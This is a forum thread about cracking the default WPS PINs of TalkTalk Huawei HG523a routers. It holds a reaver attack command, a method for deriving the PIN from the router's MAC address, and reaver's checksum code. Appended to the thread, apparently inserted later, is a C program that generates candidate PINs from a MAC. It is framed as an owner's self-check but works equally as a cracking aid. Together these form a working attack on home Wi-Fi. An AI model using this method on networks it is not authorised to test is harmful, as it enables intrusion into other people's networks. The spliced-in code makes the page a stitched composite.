Blegos

Status: n/a
Joined: Mon, 04 Nov 2013
Posts: 68
Reputation: 125
Tue, 05 Nov 2013 @ 21:24:15

Just thought I'd add a little something to this forum from my experiences with the Huawei HG523a routers that TalkTalk use, or did use. Maybe the following is common news to some, but it might help others.

TalkTalk are a popular ISP where I live and many of my friends are with them. Some have asked me to have a go at cracking their passwords to see if I can, and this is what I've learnt from doing some digging and having a go.

Most of these routers don't have WPS lock-outs so the pins can be found in the normal time, anywhere up to 12 hours. But it's also possible to cut down on that time quite considerably by starting from getting the first four pins, which can be found by taking the following steps:

1.) Take for instance TalkTalk34BDF8 with A1:B1:C1:34:BD:F8 on channel 6
2.) Take the 34BDF8 and convert it from Hex to Dec, which would be 3456504. http://www.binaryhexconverter.com/hex-to-decimal-converter
3.) Start reaver with: 'reaver -i mon0 -b A1:B1:C1:34:BD:F8 -c 6 -p 3456 -vv'
4.) Reaver will then start from 3456 and will be at 90% from the off, which should then only take ~3hrs to crack


In some cases I've seen the pin being up to 6 digits of the hex to dec output and not just 4. I've seen this happen quite often with a lot of my friends' routers. One thing I did notice though is if the output starts with a 1 then you'll need to start from the second digit in. So if your hex to dec output is 1569483 then start from 5694, or even 56948 if you can.


Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982
Tue, 05 Nov 2013 @ 22:57:51

Awesome post, thank you very much. Rep +1


hash-ire

Status: Member
Joined: Mon, 19 Aug 2013
Posts: 257
Reputation: 307
Wed, 06 Nov 2013 @ 15:23:44

Thanks for posting.

This is not really news to me and maybe to others on this forum. Anyway, for anyone who doesn't know, here's the correct explanation:

Let's take this access point (fake data):
- ESSID: TALKTALK-4E26C4
- WIFI MAC: A1:B1:C1:4E:26:C4
- ETH MAC: A1:B1:C1:4E:26:CC

Now take the second half of the ETH MAC and convert it from hexadecimal to decimal: decimal(0x4E26CC) = 5121740. Complete the PIN with the checksum digit: 51217402.

From reaver source files:

Code:
unsigned int wps_pin_checksum(unsigned int pin) {
 unsigned int accum = 0;
 while (pin) {
  accum += 3 * (pin % 10); /* digits at odd positions from the right weigh 3 */
  pin /= 10;
  accum += pin % 10;       /* digits at even positions weigh 1 */
  pin /= 10;
 }
 return (10 - accum % 10) % 10; /* the digit that makes the total a multiple of 10 */
}

You're done.

You'll notice that the ETH MAC is derivable from the WIFI MAC: ETH MAC = WIFI MAC + offset. The offset in this case is 8. If you don't know it, you may want to try numbers from 1 to 8 (usually).

NOTE: If the converted MAC is 8 digits, take off the first digit to make space for the checksum. Example: dec(0xFFFFFF) = 16777215 -> 6777215. Add the checksum: 67772155.

Also, the HEX to DEC trick using WIFI or ETH MAC works for other types of router (not NETGEAR ones sadly).
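The derivation from both posts above (low 24 bits of the MAC in decimal, the leading digit dropped when that gives 8 digits, checksum appended, and hash-ire's 1..8 offset between WIFI and ETH MAC), written out as a self-check a router owner can run against their own device to decide whether WPS should be switched off. This is an added example, not code from the thread or from reaver (only wps_pin_checksum repeats the quoted reaver algorithm); the MAC values are the fake ones from the posts.

```c
#include <stdio.h>

/* WPS PIN checksum: same algorithm as the reaver function quoted above. */
unsigned int wps_pin_checksum(unsigned int pin) {
    unsigned int accum = 0;
    while (pin) {
        accum += 3 * (pin % 10);
        pin /= 10;
        accum += pin % 10;
        pin /= 10;
    }
    return (10 - accum % 10) % 10;
}

/* Parse "AA:BB:CC:DD:EE:FF" and return its low 24 bits, or -1 if it does not parse. */
long mac_low24(const char *mac) {
    unsigned int b[6];
    if (sscanf(mac, "%2x:%2x:%2x:%2x:%2x:%2x",
               &b[0], &b[1], &b[2], &b[3], &b[4], &b[5]) != 6)
        return -1;
    return (long)((b[3] << 16) | (b[4] << 8) | b[5]);
}

/* Candidate default PIN as the posts describe it: low 24 bits of the MAC plus an
 * offset (0 for the ETH MAC itself, 1..8 when starting from the WIFI MAC) taken
 * in decimal, the first digit dropped if that gives 8 digits, then the checksum
 * digit appended. Returns 0 when the MAC string does not parse. */
unsigned int mac_default_pin(const char *mac, int offset) {
    long low = mac_low24(mac);
    if (low < 0) return 0;
    unsigned int body = (unsigned int)((low + offset) & 0xFFFFFF);
    if (body >= 10000000u) body %= 10000000u; /* 8 digits: drop the leading digit */
    return body * 10 + wps_pin_checksum(body);
}

/* Owner's self-check: is this device's WPS PIN one of the MAC-derived candidates
 * (offsets 0..8)? A 1 means the PIN is predictable and WPS should be turned off. */
int pin_is_mac_derived(const char *mac, unsigned int pin) {
    for (int off = 0; off <= 8; off++)
        if (mac_default_pin(mac, off) == pin) return 1;
    return 0;
}

int main(void) {
    /* Constructed values: the fake access point from the post above. */
    const char *wifi_mac = "A1:B1:C1:4E:26:C4";
    printf("candidate PIN from ETH MAC: %08u\n", mac_default_pin("A1:B1:C1:4E:26:CC", 0));
    printf("PIN 51217402 MAC-derived (WIFI MAC, offsets 0..8)? %d\n",
           pin_is_mac_derived(wifi_mac, 51217402u));
    return 0;
}
```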



3 Results - Page 1 of 1 -
1

We have a total of 212138 messages in 26015 topics.
We have a total of 23009 registered users.
Our newest registered member is Francescafalk.